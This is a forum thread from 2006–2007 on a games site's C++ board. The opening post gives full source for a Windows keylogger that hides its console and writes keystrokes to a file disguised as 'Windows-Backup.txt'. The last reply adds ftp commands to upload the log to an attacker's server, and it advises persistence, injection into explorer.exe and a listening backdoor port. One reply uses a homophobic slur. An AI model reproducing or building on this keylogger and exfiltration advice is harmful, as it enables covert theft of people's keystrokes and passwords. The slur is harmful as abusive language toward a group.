Free Games Forum
Free Games Games Forums Music Forums TV Forums

  Free Games Forum Home FORUM
HOME
Search Posts SEARCH
POSTS
Who's Online WHO'S
ONLINE
Log in LOG
IN
Rules & FAQ RULES / FAQ
REPORT SPAM

Free Games Forum: Game Technology: C++:
This is my! And only My Only!!! "Keylogger Code"

 

 


wakka
Senior Member


Oct 15, 2006, 9:23 PM

Post #1 of 11 (1652 views)
Shortcut
This is my! And only My Only!!! "Keylogger Code" Can't Post


Code
/*I Wakka made this keylogger,ANYONE THAT STEALS THIS!!,I WILL RIP UR BALLS OFF!*/ 
#include <windows.h>
#include <iostream>
#include <fstream>
using namespace std;
int main (int argc,char **argv)
{
HWND hide;
AllocConsole();
hide = FindWindowA("ConsoleWindowClass", NULL);
ShowWindow(hide, 0);
ofstream a_file ( "Windows-Backup.txt" );
for(;;)
{
if (GetAsyncKeyState('a'))
{
a_file<<"a";
}
else
if (GetAsyncKeyState('b'))
{
a_file<<"b";
}
else
if (GetAsyncKeyState('c'))
{
a_file<<"c";
}
else
if (GetAsyncKeyState('d'))
{
a_file<<"d";
}
else
if (GetAsyncKeyState('e'))
{
a_file<<"e";
}
else
if (GetAsyncKeyState('f'))
{
a_file<<"f";
}
else
if (GetAsyncKeyState('g'))
{
a_file<<"g";
}
else
if (GetAsyncKeyState('h'))
{
a_file<<"h";
}
else
if (GetAsyncKeyState('i'))
{
a_file<<"i";
}
else
if (GetAsyncKeyState('j'))
{
a_file<<"j";
}
else
if (GetAsyncKeyState('k'))
{
a_file<<"k";
}
else
if (GetAsyncKeyState('l'))
{
a_file<<"l";
}
else
if (GetAsyncKeyState('m'))
{
a_file<<"m";
}
else
if (GetAsyncKeyState('n'))
{
a_file<<"n";
}
else
if (GetAsyncKeyState('o'))
{
a_file<<"o";
}
else
if (GetAsyncKeyState('p'))
{
a_file<<"p";
}
else
if (GetAsyncKeyState('q'))
{
a_file<<"q";
}
else
if (GetAsyncKeyState('r'))
{
a_file<<"r";
}
else
if (GetAsyncKeyState('s'))
{
a_file<<"s";
}
else
if (GetAsyncKeyState('t'))
{
a_file<<"t";
}
else
if (GetAsyncKeyState('u'))
{
a_file<<"u";
}
else
if (GetAsyncKeyState('v'))
{
a_file<<"v";
}
else
if (GetAsyncKeyState('w'))
{
a_file<<"w";
}
else
if (GetAsyncKeyState('x'))
{
a_file<<"x";
}
else
if (GetAsyncKeyState('y'))
{
a_file<<"y";
}
else
if (GetAsyncKeyState('z'))
{
a_file<<"z";
}
}
return 0;
}

Don`t realese it!,its illegal and i have nothign to do with it,if u get hijacked!


Wakka: I see that you are from that ******* forum, by the style of your typing.
Mark: It's called a font.



12bye
Senior Member


Oct 15, 2006, 11:16 PM

Post #2 of 11 (1646 views)
Shortcut
Re: [wakka] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

lol wakka


(This post was edited by 12bye on Nov 23, 2006, 1:39 PM)


wakka
Senior Member


Oct 16, 2006, 12:08 AM

Post #3 of 11 (1643 views)
Shortcut
Re: [12bye] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

This is the programming forum,a keylooger is a program.

Noobz Who break the Law Has a big problem


Wakka: I see that you are from that ******* forum, by the style of your typing.
Mark: It's called a font.



-Pwnt-
Veteran

Oct 16, 2006, 12:34 AM

Post #4 of 11 (1642 views)
Shortcut
Re: [wakka] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

This is plagiarized anyways. Don't worry, these idiotic faggots won't know what to do with it anyways.


wakka
Senior Member


Oct 16, 2006, 2:12 AM

Post #5 of 11 (1641 views)
Shortcut
Re: [-Pwnt-] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

Ye,Most of the Noobs,like Rs scammers Don`t know Even How to run stuff on c++


Wakka: I see that you are from that ******* forum, by the style of your typing.
Mark: It's called a font.



LGLS
Veteran Controller / Veteran


Oct 16, 2006, 8:38 AM

Post #6 of 11 (1635 views)
Shortcut
Re: [wakka] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post


Quote
This is my! And only My Only!!!


Quote
/*I Wakka made this keylogger,ANYONE THAT STEALS THIS!!,I WILL RIP UR BALLS OFF!*/





Quote
Don`t realese it!,its illegal and i have nothign to do with it





Quote
This is plagiarized anyways.




Quote
Ye,



Gotta love the youth of today.


here in australia we're pretty relaxed dudes Cool


seaturtle123
Newbie


Oct 17, 2006, 9:59 AM

Post #7 of 11 (1627 views)
Shortcut
Re: [LGLS] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

Hello, i just got one question about that. I know how to add scripts to programs but got to make it into a working thing. Everytime i try downloading the thing. It shows 2 files. I only want one. And is the script different to mine?


Boom! Headshot. My hands are shaking, my hands are shaking but im still shootin, and im still giving headshots.


TazG
Veteran / Moderator


Oct 18, 2006, 11:51 PM

Post #8 of 11 (1619 views)
Shortcut
Re: [12bye] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post


In Reply To
Why the hell did you post this.

Do you realize how many dumbasses are going to use it and break the law now?

Edit: Im interpreting this as a "Guide: How to scam somebody!"

This code just writes typed letters to a text file. It can't be used for scamming because it doesn't do anything with the file. The code is inefficient, and the program is pointless. And the only keys it recognizes are the letter keys. This thread sucks.


copying floppies since 'ninety-two


MM Mercer
Senior Member


Oct 19, 2006, 4:07 AM

Post #9 of 11 (1615 views)
Shortcut
Re: [TazG] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

i was gonna say i carn't see it connect to any email system to send it or anything the only use for this is too keylog your own computer. but i use a simple program that encodes everything i type and then decodes it when it arrives so keyloggers can not get it inbetween destinations. don't ask me how they do it but it works.


Ofcourse you are now reading my sig


darkdemon
Enthusiast


Nov 23, 2006, 1:33 PM

Post #10 of 11 (1528 views)
Shortcut
Re: [wakka] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

Unless the idiot that runs the keylogger, and then logins to his e-mail, GAMES, forum, etc...
He'll have to upload the .txt file, and then he'll give you the link to download it.
Worthless project.


U r reading a signature.
Free game hacks!


yourISP.
Enthusiast

Aug 4, 2007, 9:39 AM

Post #11 of 11 (1339 views)
Shortcut
Re: [wakka] This is my! And only My Only!!! "Keylogger Code" [In reply to] Can't Post

Well, this a beginning of a key logger. Its quite easy make the program encrypt each character it adds to the the file, that way if the user finds it, all he will see is a bunch of gibberish. Then after the size of the file meets a certain amount, the machine does:


Code
ftp -A [IP address] 
put [path to key file] c:\ (or wherever you want to put this file on the FTP server.)
quit



I believe that is the proper syntax, but i haven't used ftp for a while. This would upload the key file to the attackers machine where it would be unencrypted and studied. This could be done silently without the user even knowing that a connection to an FTP server is being made, and stuff is being uploaded. Of course you don't want it connecting right to you, just use some FREE FTP server online, or make a static IP at no-ip.com

After these functions have been implemented in your key logger, make it add itself to startup, and teach it how to hide itself, inject it into explorer.exe ;)

If your good with C++ you could make a key logger like this in a matter of hours. Why do you need to make it send the keys via e-mail? This makes it all so much more complicated. To make it even better, you could listen for connections on port 1337 or w/e. You connect, and your all set.

BTW


"Some of the most intellegent people I know smoke marijuana" --Lother

 
 
 


Search for (options) Web Design by Web Ideas - Page loaded in: 0.17 s on (CGI/1.1)